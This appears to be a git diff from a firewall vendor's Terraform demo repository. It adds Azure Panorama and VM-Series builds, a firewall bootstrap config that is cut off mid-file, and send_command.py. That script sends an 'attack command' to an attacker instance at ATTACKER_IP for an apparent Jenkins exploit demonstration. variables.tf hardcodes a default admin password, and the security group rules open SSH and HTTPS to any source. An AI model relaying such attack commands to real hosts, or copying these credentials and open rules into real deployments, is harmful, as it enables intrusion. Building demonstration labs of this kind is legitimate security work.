+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.4.0
+prompt-toolkit==2.0.9
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+Twisted==18.9.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/send_command.py b/azure/Jenkins_proj-working/send_command.py
new file mode 100644
index 00000000..cbccbdfb
--- /dev/null
+++ b/azure/Jenkins_proj-working/send_command.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+    tf = Terraform(working_dir='./WebInDeploy')
+    rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError as ve:
+            print('Could not parse terraform outputs!')
+            return dict()
+
+
+def main(cli: str) -> None:
+
+    print('Attempting to launch exploit...\n')
+    outputs = get_terraform_outputs()
+
+    attacker = outputs['ATTACKER_IP']['value']
+    payload = dict()
+    payload['cli'] = cli
+
+    headers = dict()
+    headers['Content-Type'] = 'application/json'
+    headers['Accept'] = '*/*'
+
+    try:
+        resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers)
+        if resp.status_code == 200:
+            print('Command Successfully Executed!\n')
+            print(resp.text)
+            sys.exit(0)
+        else:
+            print('Could not Execute Command!\n')
+            print(resp.text)
+            sys.exit(0)
+    except ConnectionRefusedError as cre:
+        print('Could not connect to attacker instance!')
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Send Jenkins Attack Command')
+    parser.add_argument('-c', '--cli', help='Attack Command', required=True)
+    parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False)
+
+    args = parser.parse_args()
+    cli = args.cli
+    mcli = args.manual_cli
+
+    if mcli is not None and mcli != '':
+        main(mcli)
+    else:
+        main(cli)
+
diff --git a/azure/panorama_new_rg/README.md b/azure/panorama_new_rg/README.md
new file mode 100644
index 00000000..79c46c20
--- /dev/null
+++ b/azure/panorama_new_rg/README.md
@@ -0,0 +1,107 @@
+# Azure Panorama
+
+Terraform creates an instance of Panorama in a new Resource Group.
+
+## Prerequistes 
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+## Caveats
+You will need to determine the available versions of Panorama using the Azure CLI. The following command will show the Panorama versions currently available 
+
+bash-4.3# az vm image list -p paloaltonetworks -f panorama --all
+```
+[
+  {
+    "offer": "panorama",
+    "publisher": "paloaltonetworks",
+    "sku": "byol",
+    "urn": "paloaltonetworks:panorama:byol:8.1.0",
+    "version": "8.1.0"
+  },
+  {
+    "offer": "panorama",
+    "publisher": "paloaltonetworks",
+    "sku": "byol",
+    "urn": "paloaltonetworks:panorama:byol:8.1.2",
+    "version": "8.1.2"
+  },
+  {
+    "offer": "panorama",
+    "publisher": "paloaltonetworks",
+    "sku": "byol",
+    "urn": "paloaltonetworks:panorama:byol:9.1.1",
+    "version": "9.1.1"
+  }
+]
+```
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following command (**BASH ONLY!**):
+```
+# Accept VM-Series EULA for desired currently-available version of Panorama (see above command for urn)
+$ az vm image terms accept --urn paloaltonetworks:panorama:byol:8.1.2
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/panorama_new_rg
+```
+
+### 2. Edit variables.tf or create terraform.tfvars
+The variables.tf file contains default settings for the template. It may be edited to suit specific requirements or the file terraform.tfvars.sample can be used to create a terraform.tfvars file to override some or all settings.
+
+Variable descriptions:
+
+	virtualMachineRG = Name of resource group to create
+
+	Location = Target Azure region
+
+	virtualNetworkName = Virtual Network Name
+
+	addressPrefix = VNet CIDR
+
+	subnetName = Subnet name in the VNet
+
+	subnet = Subnet CIDR
+
+	publicIpAddressName = Panorama public IP address name
+
+	networkInterfaceName = Panorama network interface name
+
+	networkSecurityGroupName = Network Security Group (NSG) name
+
+	diagnosticsStorageAccountName = Diagnostics Storage Account name
+
+	diagnosticsStorageAccountTier = Diagnostics Storage Account tier
+
+	diagnosticsStorageAccountReplication = Diagnostics Storage Account replication
+
+	virtualMachineName = Panorama VM name
+
+	virtualMachineSize = Panorama VM size
+
+	panoramaVersion = Panorama Version
+
+	adminUsername = Admin Username
+
+	adminPassword = Admin Password
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+</br>
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+</br>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/panorama_new_rg/interfaces.tf b/azure/panorama_new_rg/interfaces.tf
new file mode 100644
index 00000000..f971b4e5
--- /dev/null
+++ b/azure/panorama_new_rg/interfaces.tf
@@ -0,0 +1,14 @@
+#### CREATE THE NETWORK INTERFACES ####
+
+resource "azurerm_network_interface" "panorama" {
+	name								= "${var.networkInterfaceName}"
+	location            = "${azurerm_resource_group.resourcegroup.location}"
+	resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+	ip_configuration {
+		name							              = "${var.networkInterfaceName}"
+		subnet_id						            = "${azurerm_subnet.panorama.id}"
+		private_ip_address_allocation 	= "Dynamic"
+		public_ip_address_id            = "${azurerm_public_ip.panorama.id}"
+	}
+	depends_on = ["azurerm_public_ip.panorama"]
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/nsg.tf b/azure/panorama_new_rg/nsg.tf
new file mode 100644
index 00000000..4e454d84
--- /dev/null
+++ b/azure/panorama_new_rg/nsg.tf
@@ -0,0 +1,32 @@
+resource "azurerm_network_security_group" "panorama" {
+  name                     = "${var.networkSecurityGroupName}"
+  resource_group_name      = "${azurerm_resource_group.resourcegroup.name}"
+  location                 = "${azurerm_resource_group.resourcegroup.location}"
+
+  security_rule {
+    name                       = "TCP-22"
+    priority                   = 100
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "22"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}"
+  }
+  security_rule {
+    name                       = "TCP-443"
+    priority                   = 110
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "443"
+    source_address_prefix      = "*"
+    destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}"
+  }
+}
+resource "azurerm_subnet_network_security_group_association" "panorama" {
+  subnet_id                 = "${azurerm_subnet.panorama.id}"
+  network_security_group_id = "${azurerm_network_security_group.panorama.id}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/outputs.tf b/azure/panorama_new_rg/outputs.tf
new file mode 100644
index 00000000..b23d093b
--- /dev/null
+++ b/azure/panorama_new_rg/outputs.tf
@@ -0,0 +1,3 @@
+output "Panorama Public IP:" {
+  value = "${azurerm_public_ip.panorama.ip_address}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/panorama.tf b/azure/panorama_new_rg/panorama.tf
new file mode 100644
index 00000000..4443ca98
--- /dev/null
+++ b/azure/panorama_new_rg/panorama.tf
@@ -0,0 +1,51 @@
+#### CREATE Panorama
+
+resource "azurerm_virtual_machine" "panorama" {
+	name								  = "${var.virtualMachineName}"
+	location						  = "${azurerm_resource_group.resourcegroup.location}"
+	resource_group_name   = "${azurerm_resource_group.resourcegroup.name}"
+	network_interface_ids =
+	[
+		"${azurerm_network_interface.panorama.id}",
+	]
+
+	primary_network_interface_id  = "${azurerm_network_interface.panorama.id}"
+	vm_size								        = "${var.virtualMachineSize}"
+
+  plan {
+    name      = "byol"
+    publisher = "paloaltonetworks"
+    product   = "panorama"
+  }
+
+	storage_image_reference	{
+		publisher 	= "paloaltonetworks"
+		offer		    = "panorama"
+		sku			    = "byol"
+		version		  = "${var.panoramaVersion}"
+	}
+
+	storage_os_disk {
+	  name							= "${var.virtualMachineName}"
+		caching           = "ReadWrite"
+		create_option     = "FromImage"
+    managed_disk_type = "StandardSSD_LRS"
+	}
+
+	delete_os_disk_on_termination    = true
+	delete_data_disks_on_termination = true
+
+	os_profile 	{
+		computer_name	= "${var.virtualMachineName}"
+		admin_username	= "${var.adminUsername}"
+		admin_password	= "${var.adminPassword}"
+	}
+
+	os_profile_linux_config {
+    disable_password_authentication = false
+  }
+  boot_diagnostics {
+    enabled     = "true"
+    storage_uri = "${azurerm_storage_account.mystorageaccount.primary_blob_endpoint}"
+  }
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/public-ips.tf b/azure/panorama_new_rg/public-ips.tf
new file mode 100644
index 00000000..09c1a7fc
--- /dev/null
+++ b/azure/panorama_new_rg/public-ips.tf
@@ -0,0 +1,7 @@
+#### CREATE PUBLIC IP ADDRESSES ####
+resource "azurerm_public_ip" panorama {
+	name                = "${var.publicIpAddressName}"
+	location						= "${azurerm_resource_group.resourcegroup.location}"
+	resource_group_name	= "${azurerm_resource_group.resourcegroup.name}"
+	allocation_method   = "Static"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/resource-group.tf b/azure/panorama_new_rg/resource-group.tf
new file mode 100644
index 00000000..bb71e2a6
--- /dev/null
+++ b/azure/panorama_new_rg/resource-group.tf
@@ -0,0 +1,10 @@
+//# ********** RESOURCE GROUP **********
+//# Configure the Providers
+provider "azurerm" {}
+provider "random" {}
+
+//# Create a resource group
+resource "azurerm_resource_group" "resourcegroup" {
+	name		= "${var.virtualMachineRG}"
+	location	= "${var.Location}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/route-tables.tf b/azure/panorama_new_rg/route-tables.tf
new file mode 100644
index 00000000..5d33ffa5
--- /dev/null
+++ b/azure/panorama_new_rg/route-tables.tf
@@ -0,0 +1,17 @@
+#### CREATE THE ROUTE TABLES ####
+
+resource "azurerm_route_table" "panorama" {
+  name                = "panorama"
+  location            = "${azurerm_resource_group.resourcegroup.location}"
+  resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+  route {
+    name           = "internet"
+    address_prefix = "0.0.0.0/0"
+    next_hop_type  = "internet"
+  }
+}
+
+resource "azurerm_subnet_route_table_association" "panorama" {
+  subnet_id      = "${azurerm_subnet.panorama.id}"
+  route_table_id = "${azurerm_route_table.panorama.id}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/storage-account.tf b/azure/panorama_new_rg/storage-account.tf
new file mode 100644
index 00000000..a3034ff1
--- /dev/null
+++ b/azure/panorama_new_rg/storage-account.tf
@@ -0,0 +1,11 @@
+# Storage account for boot diagnostics
+resource "random_id" "storage_account" {
+  byte_length = 4
+}
+resource "azurerm_storage_account" "mystorageaccount" {
+  name                      = "${var.diagnosticsStorageAccountName}${lower(random_id.storage_account.hex)}"
+	location						      = "${azurerm_resource_group.resourcegroup.location}"
+	resource_group_name       = "${azurerm_resource_group.resourcegroup.name}"
+  account_tier              = "${var.diagnosticsStorageAccountTier}"
+  account_replication_type  = "${var.diagnosticsStorageAccountReplication}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/terraform.tfvars.sample b/azure/panorama_new_rg/terraform.tfvars.sample
new file mode 100644
index 00000000..7ce8eb6e
--- /dev/null
+++ b/azure/panorama_new_rg/terraform.tfvars.sample
@@ -0,0 +1,33 @@
+virtualMachineRG = "<Name of resource group to create>"
+
+Location = "<Target Azure region>"
+
+virtualNetworkName = "<Virtual Network Name>"
+
+addressPrefix = "<VNet CIDR>"
+
+subnetName = "<Subnet name in the VNet>"
+
+subnet = "<Subnet CIDR>"
+
+publicIpAddressName = "<Panorama public IP address name>"
+
+networkInterfaceName = "<Panorama network interface name>"
+
+networkSecurityGroupName = "<Network Security Group (NSG) name>"
+
+diagnosticsStorageAccountName = "<Diagnostics Storage Account name>"
+
+diagnosticsStorageAccountTier = "<Diagnostics Storage Account tier>"
+
+diagnosticsStorageAccountReplication = "<Diagnostics Storage Account replication>"
+
+virtualMachineName = "<Panorama VM name>"
+
+virtualMachineSize = "<Panorama VM size>"
+
+panoramaVersion = "<Panorama Version>"
+
+adminUsername = "<Admin Username>"
+
+adminPassword = "<Admin Password>"
\ No newline at end of file
diff --git a/azure/panorama_new_rg/variables.tf b/azure/panorama_new_rg/variables.tf
new file mode 100644
index 00000000..9456111b
--- /dev/null
+++ b/azure/panorama_new_rg/variables.tf
@@ -0,0 +1,68 @@
+variable "virtualMachineRG" {
+  description = "Virtual Machine RG"
+  default     = "pglynn-test"
+}
+variable "Location" {
+  description = "Location"
+  default     = "centralus"
+}
+variable "virtualNetworkName" {
+  description = "Virtual Network Name"
+  default     = "panorama"
+}
+variable "addressPrefix" {
+  description = "Address Prefix"
+  default     = "10.0.0.0/24"
+}
+variable "subnetName" {
+  description = "Subnet Name"
+  default     = "panorama"
+}
+variable "subnet" {
+  description = "Subnet"
+  default     = "10.0.0.0/24"
+}
+variable "publicIpAddressName" {
+  description = "Public Ip Address Name"
+  default     = "panorama"
+}
+variable "networkInterfaceName" {
+  description = "Network Interface Name"
+  default     = "panorama"
+}
+variable "networkSecurityGroupName" {
+  description = "Network Security Group Name"
+  default     = "panorama"
+}
+variable "diagnosticsStorageAccountName" {
+  description = "Diagnostics Storage Account Name"
+  default     = "panorama"
+}
+variable "diagnosticsStorageAccountTier" {
+  description = "Diagnostics Storage Account Tier"
+  default     = "Standard"
+}
+variable "diagnosticsStorageAccountReplication" {
+  description = "Diagnostics Storage Account Replication"
+  default     = "LRS"
+}
+variable "virtualMachineName" {
+  description = "Virtual Machine Name"
+  default     = "panorama"
+}
+variable "virtualMachineSize" {
+  description = "Virtual Machine Size"
+  default     = "Standard_D3"
+}
+variable "panoramaVersion" {
+  description = "Panorama Version"
+  default     = "8.1.2"
+}
+variable "adminUsername" {
+  description = "Admin Username"
+  default     = "panadmin"
+}
+variable "adminPassword" {
+  description = "Admin Password"
+  default     = "Pal0Alt0@123"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/vnet-subnets.tf b/azure/panorama_new_rg/vnet-subnets.tf
new file mode 100644
index 00000000..fba7b3cf
--- /dev/null
+++ b/azure/panorama_new_rg/vnet-subnets.tf
@@ -0,0 +1,18 @@
+# ********** VNET **********
+
+# Create a virtual network
+resource "azurerm_virtual_network" "vnet" {
+  name				        = "${var.virtualNetworkName}"
+  address_space		    = ["${var.addressPrefix}"]
+  location		        = "${azurerm_resource_group.resourcegroup.location}"
+  resource_group_name	= "${azurerm_resource_group.resourcegroup.name}"
+}
+
+# Create the subnet
+
+resource "azurerm_subnet" "panorama" {
+  name                 = "${var.subnetName}"
+  resource_group_name  = "${azurerm_resource_group.resourcegroup.name}"
+  virtual_network_name = "${azurerm_virtual_network.vnet.name}"
+  address_prefix       = "${var.subnet}"
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common/GUIDE.pdf b/azure/transit_2fw_2spoke_common/GUIDE.pdf
new file mode 100644
index 00000000..c66ebfe6
Binary files /dev/null and b/azure/transit_2fw_2spoke_common/GUIDE.pdf differ
diff --git a/azure/transit_2fw_2spoke_common/README.md b/azure/transit_2fw_2spoke_common/README.md
new file mode 100644
index 00000000..4c19611a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/README.md
@@ -0,0 +1,60 @@
+# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VNETs
+
+Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering).  The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs.  All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet.  All inbound traffic from the internet is sent through a public load balancer.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information.
+
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/images/diagram.png">
+</p> 
+
+
+## Prerequistes 
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+  
+</br>
+
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following **BASH ONLY!**.
+```
+# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2)
+$ az vm image terms accept --urn paloaltonetworks:vmseries1:<byol><bundle1><bundle2>:9.0.1
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1.
+
+```
+$ vi terraform.tfvars
+```
+
+<p align="center">
+<b>Your terraform.tfvars should look like this before proceeding</b>
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/images/tfvars.png" width="75%" height="75%" >
+</p>    
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+</br>
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+</br>
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml
new file mode 100644
index 00000000..47185aa0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common/bootstrap_files/config/bootstrap.xml
@@ -0,0 +1,1058 @@
+<?xml version="1.0"?>
+<config version="9.0.0" urldb="paloaltonetworks">
+  <devices>
+    <entry name="localhost.localdomain">
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>no</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <dns-setting>
+            <servers>
+              <primary>8.8.8.8</primary>
+              <secondary>4.2.2.2</secondary>
+            </servers>
+          </dns-setting>
+          <hostname>fw1</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <hostname>fw1</hostname>
+              <username>paloalto</username>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>no</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>no</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <dns-primary>8.8.8.8</dns-primary>
+              <dns-secondary>4.2.2.2</dns-secondary>
+            </initcfg>
+          </management>
+          <ctd>
+            <x-forwarded-for>yes</x-forwarded-for>
+          </ctd>
+        </setting>
+      </deviceconfig>
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <enabled>no</enabled>
+                </ipv6>
+                <interface-management-profile>allow-health-probe</interface-management-profile>
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <dhcp-client>
+                  <enable>yes</enable>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+              </layer3>
+              <comment/>
+            </entry>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <enabled>no</enabled>
+                </ipv6>
+                <interface-management-profile>allow-health-probe</interface-management-profile>
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <dhcp-client>
+                  <enable>yes</enable>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+              </layer3>
+              <comment/>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="allow-health-probe">
+              <ping>no</ping>
+              <telnet>no</telnet>
+              <ssh>yes</ssh>
+              <http>no</http>
+              <http-ocsp>no</http-ocsp>
+              <https>no</https>
+              <snmp>no</snmp>
+              <response-pages>no</response-pages>
+              <userid-service>no</userid-service>
+              <userid-syslog-listener-ssl>no</userid-syslog-listener-ssl>
+              <userid-syslog-listener-udp>no</userid-syslog-listener-udp>
+              <permitted-ip>
+                <entry name="168.63.129.16/32"/>
+              </permitted-ip>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="untrust-vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+            </interface>
+            <admin-dists>
+              <static>10</static>
+              <static-ipv6>10</static-ipv6>
+              <ospf-int>30</ospf-int>
+              <ospf-ext>110</ospf-ext>
+              <ospfv3-int>30</ospfv3-int>
+              <ospfv3-ext>110</ospfv3-ext>
+              <ibgp>200</ibgp>
+              <ebgp>20</ebgp>
+              <rip>120</rip>
+            </admin-dists>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>10.0.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
